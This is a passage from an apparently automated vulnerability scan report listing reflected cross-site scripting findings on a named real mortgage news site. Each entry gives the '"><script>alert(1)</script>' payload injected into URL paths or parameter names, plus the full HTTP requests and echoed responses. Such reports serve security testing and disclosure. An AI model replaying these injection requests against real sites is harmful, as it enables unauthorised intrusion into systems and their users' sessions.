Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/10218bc\"><script>alert(1)</script>3aaf6a800aa/feed/" /> ...[SNIP]...
1.236. http://mortgage.ocregister.com/2007/10/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2007/10/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7a6b"><script>alert(1)</script>aa7394ea76f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b7a6b\"><script>alert(1)</script>aa7394ea76f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/10/?b7a6b"><script>alert(1)</script>aa7394ea76f=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 October - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/10/?b7a6b\"><script>alert(1)</script>aa7394ea76f=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78913"><script>alert(1)</script>415c27e9059 was submitted in the REST URL parameter 1. This input was echoed as 78913\"><script>alert(1)</script>415c27e9059 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200778913"><script>alert(1)</script>415c27e9059/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62642
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200778913\"><script>alert(1)</script>415c27e9059/11/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55a46"><script>alert(1)</script>b3caab2696d was submitted in the REST URL parameter 2. This input was echoed as 55a46\"><script>alert(1)</script>b3caab2696d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/1155a46"><script>alert(1)</script>b3caab2696d/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/1155a46\"><script>alert(1)</script>b3caab2696d/feed/" /> ...[SNIP]...
1.239. http://mortgage.ocregister.com/2007/11/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2007/11/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d88ca"><script>alert(1)</script>829bb9d7991 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d88ca\"><script>alert(1)</script>829bb9d7991 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/11/?d88ca"><script>alert(1)</script>829bb9d7991=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87555
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 November - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/11/?d88ca\"><script>alert(1)</script>829bb9d7991=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83bb0"><script>alert(1)</script>5b51746308e was submitted in the REST URL parameter 1. This input was echoed as 83bb0\"><script>alert(1)</script>5b51746308e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200783bb0"><script>alert(1)</script>5b51746308e/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200783bb0\"><script>alert(1)</script>5b51746308e/12/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7553a"><script>alert(1)</script>4b6519fec9b was submitted in the REST URL parameter 2. This input was echoed as 7553a\"><script>alert(1)</script>4b6519fec9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/127553a"><script>alert(1)</script>4b6519fec9b/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/127553a\"><script>alert(1)</script>4b6519fec9b/feed/" /> ...[SNIP]...
1.242. http://mortgage.ocregister.com/2007/12/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2007/12/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db24"><script>alert(1)</script>33a184a2162 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4db24\"><script>alert(1)</script>33a184a2162 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/12/?4db24"><script>alert(1)</script>33a184a2162=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90535
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 December - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/12/?4db24\"><script>alert(1)</script>33a184a2162=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d30"><script>alert(1)</script>9a1798c9a18 was submitted in the REST URL parameter 1. This input was echoed as 47d30\"><script>alert(1)</script>9a1798c9a18 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200847d30"><script>alert(1)</script>9a1798c9a18/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200847d30\"><script>alert(1)</script>9a1798c9a18/01/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de23d"><script>alert(1)</script>2d509002565 was submitted in the REST URL parameter 2. This input was echoed as de23d\"><script>alert(1)</script>2d509002565 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/01de23d"><script>alert(1)</script>2d509002565/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/01de23d\"><script>alert(1)</script>2d509002565/feed/" /> ...[SNIP]...
1.245. http://mortgage.ocregister.com/2008/01/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2008/01/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fd34"><script>alert(1)</script>6eeaa914028 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1fd34\"><script>alert(1)</script>6eeaa914028 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/01/?1fd34"><script>alert(1)</script>6eeaa914028=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89103
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 January - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/01/?1fd34\"><script>alert(1)</script>6eeaa914028=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3080f"><script>alert(1)</script>0eba11e28c7 was submitted in the REST URL parameter 1. This input was echoed as 3080f\"><script>alert(1)</script>0eba11e28c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20083080f"><script>alert(1)</script>0eba11e28c7/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20083080f\"><script>alert(1)</script>0eba11e28c7/02/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be2dc"><script>alert(1)</script>3615908630 was submitted in the REST URL parameter 2. This input was echoed as be2dc\"><script>alert(1)</script>3615908630 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/02be2dc"><script>alert(1)</script>3615908630/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/02be2dc\"><script>alert(1)</script>3615908630/feed/" /> ...[SNIP]...
1.248. http://mortgage.ocregister.com/2008/02/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2008/02/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c44db"><script>alert(1)</script>debe3db6973 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c44db\"><script>alert(1)</script>debe3db6973 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/02/?c44db"><script>alert(1)</script>debe3db6973=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89848
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/02/?c44db\"><script>alert(1)</script>debe3db6973=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfaad"><script>alert(1)</script>feb9e55050e was submitted in the REST URL parameter 1. This input was echoed as cfaad\"><script>alert(1)</script>feb9e55050e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008cfaad"><script>alert(1)</script>feb9e55050e/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008cfaad\"><script>alert(1)</script>feb9e55050e/03/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58700"><script>alert(1)</script>3e5461fd9e3 was submitted in the REST URL parameter 2. This input was echoed as 58700\"><script>alert(1)</script>3e5461fd9e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/0358700"><script>alert(1)</script>3e5461fd9e3/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643
